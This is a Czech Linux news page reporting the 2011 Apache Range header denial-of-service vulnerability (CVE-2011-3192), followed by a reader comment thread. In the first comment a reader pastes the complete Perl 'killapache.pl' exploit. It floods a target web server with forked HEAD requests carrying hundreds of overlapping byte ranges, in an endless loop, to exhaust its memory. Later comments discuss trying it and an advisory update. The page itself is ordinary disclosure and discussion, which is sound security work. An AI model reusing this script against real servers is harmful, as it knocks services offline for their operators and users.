abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 13:22 | IT novinky

    Společnost Raspberry Pi nově nabzí Raspberry Pi Camera Module 3 Sensor Assembly, tj. samostatné senzorové moduly z Raspberry Pi Camera Module 3.

    Ladislav Hagara | Komentářů: 0
    dnes 13:00 | Nasazení Linuxu

    Cathode Ray Dude v novém videu ukazuje autorádio Empeg Car (později Rio Car) z let 1999–2001. Šlo o jeden z prvních přehrávačů MP3 do auta. Běží na něm Linux. Vyrobeno bylo jen asi pět tisíc kusů, ale zůstala kolem nich živá komunita, viz např. web riocar.org.

    Fluttershy, yay! | Komentářů: 0
    dnes 02:11 | Nová verze

    Open source platforma Home Assistant (Demo, GitHub, Wikipedie) pro monitorování a řízení inteligentní domácnosti byla vydána v nové verzi 2025.7.

    Ladislav Hagara | Komentářů: 0
    dnes 01:44 | Nová verze

    Wayland byl vydán ve verzi 1.24.0. Jde o menší vydání po více než roce. Více funkcionality bývá přidáváno v průběžných vydáních Wayland Protocols.

    Fluttershy, yay! | Komentářů: 0
    včera 23:44 | Nová verze

    Textový editor Geany byl vydán ve verzi 2.1. Jde o udržovací vydání po bezmála dvou letech. Obsahuje drobná vylepšení vyhledávání, aktualizace podpory zvýrazňování syntaxe a dále převážně opravy chyb.

    Fluttershy, yay! | Komentářů: 1
    včera 19:44 | Komunita

    Byly zveřejněny videozáznamy, dostupné také s prezentacemi přímo z programu, a také fotogalerie z open source komunitní konference DevConf.CZ 2025 konané od 12. do 14. června v Brně.

    Ladislav Hagara | Komentářů: 0
    5.7. 20:22 | Zajímavý software

    Navigace se soukromím CoMaps postavena nad OpenStreetMap je nově k dispozici v Google Play, App Store i F-Droid. Jedná se o komunitní fork aplikace Organic Maps.

    Ladislav Hagara | Komentářů: 7
    4.7. 19:33 | Nová verze

    Vývojáři OpenMW (Wikipedie) oznámili vydání verze 0.49.0 této svobodné implementace enginu pro hru The Elder Scrolls III: Morrowind. Přehled novinek i s náhledy obrazovek v oznámení o vydání.

    Ladislav Hagara | Komentářů: 1
    4.7. 15:22 | IT novinky

    Masivní výpadek elektrického proudu zasáhl velkou část České republiky. Hasiči vyjížděli k většímu počtu lidí uvězněných ve výtazích. Výpadek se týkal zejména severozápadu republiky, dotkl se také Prahy, Středočeského nebo Královéhradeckého kraje. Ochromen byl provoz pražské MHD, linky metra se už podařilo obnovit. Výpadek proudu postihl osm rozvoden přenosové soustavy, pět z nich je nyní opět v provozu. Příčina problémů je však stále neznámá. Po 16. hodině zasedne Ústřední krizový štáb.

    Ladislav Hagara | Komentářů: 95
    4.7. 02:33 | Nová verze

    Po více než roce vývoje od vydání verze 5.40 byla vydána nová stabilní verze 5.42 programovacího jazyka Perl (Wikipedie). Do vývoje se zapojilo 64 vývojářů. Změněno bylo přibližně 280 tisíc řádků v 1 500 souborech. Přehled novinek a změn v podrobném seznamu.

    Ladislav Hagara | Komentářů: 7
    Jaký je váš oblíbený skriptovací jazyk?
     (60%)
     (27%)
     (7%)
     (2%)
     (1%)
     (1%)
     (3%)
    Celkem 364 hlasů
     Komentářů: 16, poslední 8.6. 21:05
    Rozcestník

    DoS zranitelnost webového serveru Apache

    Byla objevena DoS zranitelnost webového serveru Apache (Range header DoS vulnerability Apache HTTPD 1.3/2.x, CVE-2011-3192, Bugtraq ID: 49303). V oficiálním bezpečnostním upozornění se uvádí 5 doporučení pro zmírnění dopadů útoků. Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána do 48 hodin.

    25.8.2011 19:20 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    25.8.2011 21:39 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    #By Kingcope
    #Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #
    
    use IO::Socket;
    use Parallel::ForkManager;
    
    sub usage {
    	print "Apache Remote Denial of Service (memory exhaustion)\n";
    	print "by Kingcope\n";
    	print "usage: perl killapache.pl <host> [numforks]\n";
    	print "example: perl killapache.pl www.example.com 50\n";
    }
    
    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
    =09
    $pm =3D new Parallel::ForkManager($numforks);
    
    $|=3D1;
    srand(time());
    $p =3D "";
    for ($k=3D0;$k<1300;$k++) {
    	$p .=3D ",5-$k";
    }
    
    for ($k=3D0;$k<$numforks;$k++) {
    my $pid =3D $pm->start and next; =09
    =09
    $x =3D "";
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    while(<$sock>) {
    }
     $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
    }
    
    sub testapache {
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    $x =3D <$sock>;
    if ($x =3D~ /Partial/) {
    	print "host seems vuln\n";
    	return 1;=09
    } else {
    	return 0;=09
    }
    }
    
    if ($#ARGV < 0) {
    	usage;
    	exit;=09
    }
    
    if ($#ARGV > 1) {
    	$numforks =3D $ARGV[1];
    } else {$numforks =3D 50;}
    
    $v =3D testapache();
    if ($v =3D=3D 0) {
    	print "Host does not seem vulnerable\n";
    	exit;=09
    }
    while(1) {
    killapache();
    }
    
    NN
    25.8.2011 21:43 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110820/848b4dca/attachment.obj
    25.8.2011 22:09 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Utoci to a... nic sa nedeje. Aspon na mojom serveri.
    MMMMMMMMM avatar 25.8.2011 22:28 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Host does not seem vulnerable (to vidím zase já, když "útočím" na své servery)
    25.8.2011 22:38 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Skus nejaky vacsi subor, potom to bude posielat po 50 paketoch a nic z toho.
    pepe_ avatar 25.8.2011 22:43 pepe_ | skóre: 48
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru

    A funguje to i s lighttpd/mysql/php5 s cgifixem ?

    26.8.2011 19:07 Ladislav Hagara | skóre: 105 | blog: Ride the Raven
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Aktualizace bezpečnostního upozornění.
    Problémem je nejenom 'Range' header ale také 'Range-Request' header.
    Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána snad do 24 hodin.
    Otto Šabart avatar 27.8.2011 01:10 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Exploit vyšel na exploit-db.com už před 8 dny... No zkoušel jsem ho a také mi nefunguje.
    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.